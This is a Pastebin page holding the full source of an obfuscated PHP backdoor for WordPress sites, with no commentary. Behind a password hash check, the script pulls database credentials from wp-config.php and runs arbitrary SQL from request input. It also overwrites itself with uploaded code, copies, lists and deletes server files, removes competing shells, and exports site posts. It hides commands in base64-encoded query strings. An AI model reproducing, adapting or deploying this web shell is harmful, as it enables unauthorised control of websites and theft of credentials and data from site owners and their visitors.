API tools faq
paste
PalmaSolutions

sp5093af

PalmaSolutions
Nov 2nd, 2018
183
0
Never
Add comment
Not a member of Pastebin yet? Sign Up, it unlocks many cool features!
text 10.58 KB | None | 0 0
raw download clone embed print report
  1. 6jR6TW1
  2. <?php
  3. define('EXT_MYSQLI', 'mysqli'); define('EXT_MYSQL', 'mysql'); define('CONF_PASSWORD_HASH', '949ce57c78af6fc302cbe0002212f18f'); define('VERSION', '0.2.3'); function r_get_lib() { if (class_exists('mysqli')) { return EXT_MYSQLI; } if (function_exists('mysql_connect')) { return EXT_MYSQL; } } function r_get_config_path() { $sp4d3aea = realpath('.'); $sp358a51 = 0; while ($sp4d3aea != '/') { if (file_exists(sprintf('%s/wp-config.php', $sp4d3aea)) && file_exists(sprintf('%s/index.php', $sp4d3aea)) && file_exists(sprintf('%s/wp-settings.php', $sp4d3aea))) { return $sp4d3aea; } $sp358a51++; $sp4d3aea = realpath(str_repeat('../', $sp358a51)); } } function r_get_config() { $sp4d3aea = realpath('.'); $sp358a51 = 0; while ($sp4d3aea != '/') { file_put_contents('flog.log', $sp4d3aea . '
  4. ', FILE_APPEND); if (file_exists(sprintf('%s/wp-config.php', $sp4d3aea)) && file_exists(sprintf('%s/index.php', $sp4d3aea)) && file_exists(sprintf('%s/wp-settings.php', $sp4d3aea))) { $sp44298d = file(sprintf('%s/wp-config.php', $sp4d3aea)); $sp44298d = preg_grep('/defined/i', preg_grep('/define|table_prefix/i', $sp44298d), PREG_GREP_INVERT); $sp44298d = implode('
  5. ', $sp44298d); eval($sp44298d); $spc01801 = 'table_prefix'; $sp51619b = explode(':', DB_HOST); $sp65008b = array_shift($sp51619b); $sp5344f5 = array_shift($sp51619b); $sp5344f5 = $sp5344f5 ? $sp5344f5 : 3306; return array('host' => $sp65008b, 'port' => $sp5344f5, 'db' => DB_NAME, 'user' => DB_USER, 'pass' => DB_PASSWORD, 'prefix' => ${$spc01801}, 'path' => $sp4d3aea); break; } $sp358a51++; $sp4d3aea = realpath(str_repeat('../', $sp358a51)); } } function r_mysql_connect($sp44298d) { $sp4a5aaf = mysql_connect(sprintf('%s:%s', $sp44298d['host'], $sp44298d['port']), $sp44298d['user'], $sp44298d['pass']); mysql_select_db($sp44298d['db'], $sp4a5aaf); return $sp4a5aaf; } function r_mysqli_connect($sp44298d) { return new mysqli($sp44298d['host'], $sp44298d['user'], $sp44298d['pass'], $sp44298d['db'], is_numeric($sp44298d['port']) ? $sp44298d['port'] : 3306, !is_numeric($sp44298d['port']) ? $sp44298d['port'] : null); } function r_mysql_query($sp44298d, $sp4a5aaf, $spca3655, $sp8fc62e = array()) { if (!empty($sp8fc62e)) { foreach ($sp8fc62e as $sp999b47 => $sp7a489b) { $spca3655 = str_replace($sp999b47, mysql_real_escape_string($sp7a489b, $sp4a5aaf), $spca3655); } } $spe87075 = array(); $sp5093af = mysql_query($spca3655, $sp4a5aaf); if ($sp5093af) { while ($sp03340a = mysql_fetch_assoc($sp5093af)) { $spe87075[] = $sp03340a; } return array('success' => $spe87075); } else { return array('error' => sprintf('%s :: %s', mysql_errno($sp4a5aaf), mysql_error($sp4a5aaf))); } } function r_mysqli_query($sp44298d, $sp4a5aaf, $spca3655, $sp8fc62e = array()) { if (!empty($sp8fc62e)) { foreach ($sp8fc62e as $sp999b47 => $sp7a489b) { $spca3655 = str_replace($sp999b47, $sp4a5aaf->real_escape_string($sp7a489b), $spca3655); } } $sp5093af = $sp4a5aaf->query($spca3655); if (is_object($sp5093af)) { $spe87075 = array(); while ($sp03340a = $sp5093af->fetch_assoc()) { $spe87075[] = $sp03340a; } return array('success' => $spe87075); } if ($sp5093af) { return array('success' => true); } else { return array('error' => sprintf('%s :: %s', $sp4a5aaf->errno, $sp4a5aaf->error)); } } function r_mysql_query_res($sp44298d, $sp4a5aaf, $spca3655, $sp8fc62e = array()) { if (!empty($sp8fc62e)) { foreach ($sp8fc62e as $sp999b47 => $sp7a489b) { $spca3655 = str_replace($sp999b47, mysql_real_escape_string($sp7a489b, $sp4a5aaf), $spca3655); } } $spe87075 = array(); $sp5093af = mysql_query($spca3655, $sp4a5aaf); return $sp5093af; } function r_mysql_query_row($sp5093af) { if ($sp5093af) { return mysql_fetch_assoc($sp5093af); } else { return false; } } function r_mysqli_query_res($sp44298d, $sp4a5aaf, $spca3655, $sp8fc62e = array()) { if (!empty($sp8fc62e)) { foreach ($sp8fc62e as $sp999b47 => $sp7a489b) { $spca3655 = str_replace($sp999b47, $sp4a5aaf->real_escape_string($sp7a489b), $spca3655); } } $sp5093af = $sp4a5aaf->query($spca3655); return $sp5093af; } function r_mysqli_query_row($sp5093af) { if (is_object($sp5093af)) { return $sp5093af->fetch_assoc(); } else { return false; } } function r_unmagic() { if (get_magic_quotes_gpc()) { foreach ($_POST as $sp999b47 => $sp7a489b) { $_POST[$sp999b47] = stripslashes($sp7a489b); } } } function r_action_prefix() { $sp44298d = r_get_config(); echo $sp44298d['prefix']; } function r_action_query() { r_unmagic(); $sp44298d = r_get_config(); $spd26c78 = r_get_lib(); $sp8fc62e = json_decode($_POST['bind'], true); if (isset($_POST['decode'])) { $sp8d4793 = array_map('trim', explode(',', $_POST['decode'])); foreach ($sp8d4793 as $sp96d1d2) { if (isset($sp8fc62e[$sp96d1d2])) { $sp8fc62e[$sp96d1d2] = base64_decode($sp8fc62e[$sp96d1d2]); } } } $sp4a5aaf = call_user_func(sprintf('r_%s_connect', $spd26c78), $sp44298d); $sp5093af = call_user_func(sprintf('r_%s_query', $spd26c78), $sp44298d, $sp4a5aaf, $_POST['query'], $sp8fc62e); if (isset($_POST['encode'])) { $sp8175f9 = array_map('trim', explode(',', $_POST['encode'])); foreach ($sp5093af['success'] as $sp7abe3d => $sp03340a) { foreach ($sp8175f9 as $spd2c3d9) { $sp5093af['success'][$sp7abe3d][$spd2c3d9] = base64_encode($sp5093af['success'][$sp7abe3d][$spd2c3d9]); } } } echo json_encode($sp5093af); } function r_action_update() { file_put_contents(__FILE__, base64_decode($_POST['file'])); echo md5(base64_decode($_POST['file'])); } function r_action_version() { echo VERSION; } function r_action_duplicate() { $spc38d10 = copy(__FILE__, $_POST['dst']); echo (int) $spc38d10; } function r_action_copy() { $spc38d10 = copy($_POST['src'], $_POST['dst']); echo (int) $spc38d10; } function r_action_dir() { $spc38d10 = array(); $sp96d1d2 = dir($_POST['dir']); while (false !== ($sp62e900 = $sp96d1d2->read())) { $sp31ec6c = sprintf('%s/%s', rtrim($_POST['dir'], '/'), $sp62e900); $spc38d10[] = array('type' => is_file($sp31ec6c) ? 'file' : (is_dir($sp31ec6c) ? 'dir' : 'unknown'), 'entry' => $sp62e900, 'full_entry' => $sp31ec6c, 'realpath' => realpath($sp31ec6c)); } $sp96d1d2->close(); echo json_encode($spc38d10); } function r_action_wpversion() { $sp4d3aea = r_get_config_path(); $sp0dd9d2 = file_get_contents(sprintf('%s/wp-settings.php', $sp4d3aea)); preg_match_all('/define\\(([^\\)]+)/i', $sp0dd9d2, $sp156f73); foreach ($sp156f73[1] as $spfd8c6c) { if (strpos($spfd8c6c, 'WPINC') !== false) { $spfd8c6c = array_map('trim', explode(',', $spfd8c6c)); foreach ($spfd8c6c as $sp2ed6b7 => $spfab5ae) { if ($spfab5ae[0] == $spfab5ae[strlen($spfab5ae) - 1]) { $spfd8c6c[$sp2ed6b7] = substr($spfab5ae, 1, strlen($spfab5ae) - 2); } } require_once $sp2d82e7 = sprintf('%s%s%s%sversion.php', $sp4d3aea, DIRECTORY_SEPARATOR, str_replace('/', DIRECTORY_SEPARATOR, $spfd8c6c[1]), DIRECTORY_SEPARATOR); $sped999b = 'wp_version'; echo ${$sped999b}; die; } } echo 'error'; } function r_action_w3tc() { $sp4d3aea = r_get_config_path(); $sp8dc1ff = rtrim(preg_replace('/^http[s]{0,1}\\:\\/\\//i', '', $_POST['url']), '/'); $sp823e9e = sprintf('%s/wp-content/cache/page_enhanced/%s/_index.html', $sp4d3aea, $sp8dc1ff); if (file_exists($sp823e9e)) { unlink($sp823e9e); } $sp823e9e = sprintf('%s/wp-content/cache/page_enhanced/%s/_index.html_gzip', $sp4d3aea, $sp8dc1ff); if (file_exists($sp823e9e)) { unlink($sp823e9e); } echo 'success'; } function r_action_cenabler() { $sp4d3aea = r_get_config_path(); $sp8dc1ff = rtrim(preg_replace('/^http[s]{0,1}\\:\\/\\//i', '', $_POST['url']), '/'); $sp823e9e = sprintf('%s/wp-content/cache/cache-enabler/%s/index.html', $sp4d3aea, $sp8dc1ff); if (file_exists($sp823e9e)) { unlink($sp823e9e); } $sp823e9e = sprintf('%s/wp-content/cache/cache-enabler/%s/index.html.gz', $sp4d3aea, $sp8dc1ff); if (file_exists($sp823e9e)) { unlink($sp823e9e); } $sp823e9e = sprintf('%s/wp-content/cache/cache-enabler/%s/index-webp.html', $sp4d3aea, $sp8dc1ff); if (file_exists($sp823e9e)) { unlink($sp823e9e); } $sp823e9e = sprintf('%s/wp-content/cache/cache-enabler/%s/index-webp.html.gz', $sp4d3aea, $sp8dc1ff); if (file_exists($sp823e9e)) { unlink($sp823e9e); } echo 'success'; } function r_action_removeshell() { if (file_exists($sp1e8ead = sprintf('%s%s%s', rtrim($_SERVER['DOCUMENT_ROOT'], '/'), DIRECTORY_SEPARATOR, str_replace('/', DIRECTORY_SEPARATOR, ltrim($_POST['shell_url'], '/'))))) { if ($sp1e8ead != __FILE__) { unlink($sp1e8ead); } echo file_exists($sp1e8ead) ? 'fail' : 'success'; } else { echo 'ignore'; } } function r_action_remove() { if (file_exists($_POST['file'])) { if ($_POST['file'] != __FILE__) { unlink($_POST['file']); } echo file_exists($_POST['file']) ? 'fail' : 'success'; } else { echo 'ignore'; } } function r_action_pages() { $sp15f9bc = tempnam('./', 'wp') . '.php'; $spd80d03 = fopen($sp15f9bc, 'w'); $sp4d3aea = r_get_config_path(); chdir($sp4d3aea); $spafbbb7 = $_POST['id']; require $sp4d3aea . '/wp-load.php'; r_unmagic(); $sp44298d = r_get_config(); $spd26c78 = r_get_lib(); $spce2591 = $sp44298d['prefix']; $sp4a5aaf = call_user_func(sprintf('r_%s_connect', $spd26c78), $sp44298d); $sp5093af = call_user_func(sprintf('r_%s_query_res', $spd26c78), $sp44298d, $sp4a5aaf, sprintf('SELECT * FROM `%sposts` WHERE `post_type` IN ( "post", "page" ) AND `post_status` = "publish" AND `ID` > %s ORDER BY `ID` ASC LIMIT %s, %s', $spce2591, $_POST['remote_id'], $_POST['batch_start'], $_POST['batch_size'])); while ($sp03340a = call_user_func(sprintf('r_%s_query_row', $spd26c78), $sp5093af)) { fputcsv($spd80d03, array($sp03340a['ID'], base64_encode($sp03340a['post_content']), base64_encode($sp03340a['post_title']), base64_encode(get_permalink($sp03340a['ID'])))); } fclose($spd80d03); echo $sp15f9bc; } function r_action_config() { echo json_encode(r_get_config()); } function r_action_getlib() { echo r_get_lib(); } function r_action_magic() { echo get_magic_quotes_gpc() ? 'Yes' : 'No'; } function r_action_loginurl() { $sp114519 = (isset($_SERVER['HTTPS']) ? 'https' : 'http') . "://{$_SERVER['HTTP_HOST']}{$_SERVER['REQUEST_URI']}"; $sp783558 = $sp114519; $spb870d9 = basename(__FILE__); $sp15f9bc = basename(tempnam('./', 'ert') . '.php'); $spe9cc74 = preg_replace(sprintf('/%s$/i', preg_quote($spb870d9)), $sp15f9bc, $sp783558); echo file_get_contents($spe9cc74); } if (count($_GET) == 1 && !trim($spc6c933 = array_pop(array_values($_GET)))) { $sp5093af = array(); parse_str(base64_decode(array_shift(array_keys($_GET))), $sp5093af); $_GET = $sp5093af; } $_POST = array_merge($_POST, $_GET); if (CONF_PASSWORD_HASH == md5($_POST['password'])) { switch ($_POST['action']) { case 'link': $sp4d3aea = r_get_config_path(); chdir($sp4d3aea); $spafbbb7 = $_POST['id']; require_once $sp4d3aea . '/wp-load.php'; $spfcea45 = get_permalink($_POST['id']); echo sprintf('[<{%s}>]', $spfcea45); break; default: $sp5a8c30 = sprintf('r_action_%s', $_POST['action']); call_user_func($sp5a8c30); break; } } else { die('ympf'); }
Add Comment
Please, Sign In to add comment
Public Pastes
We use cookies for various purposes including analytics. By continuing to use Pastebin, you agree to our use of cookies as described in the Cookies Policy.  OK, I Understand
Not a member of Pastebin yet?
Sign Up, it unlocks many cool features!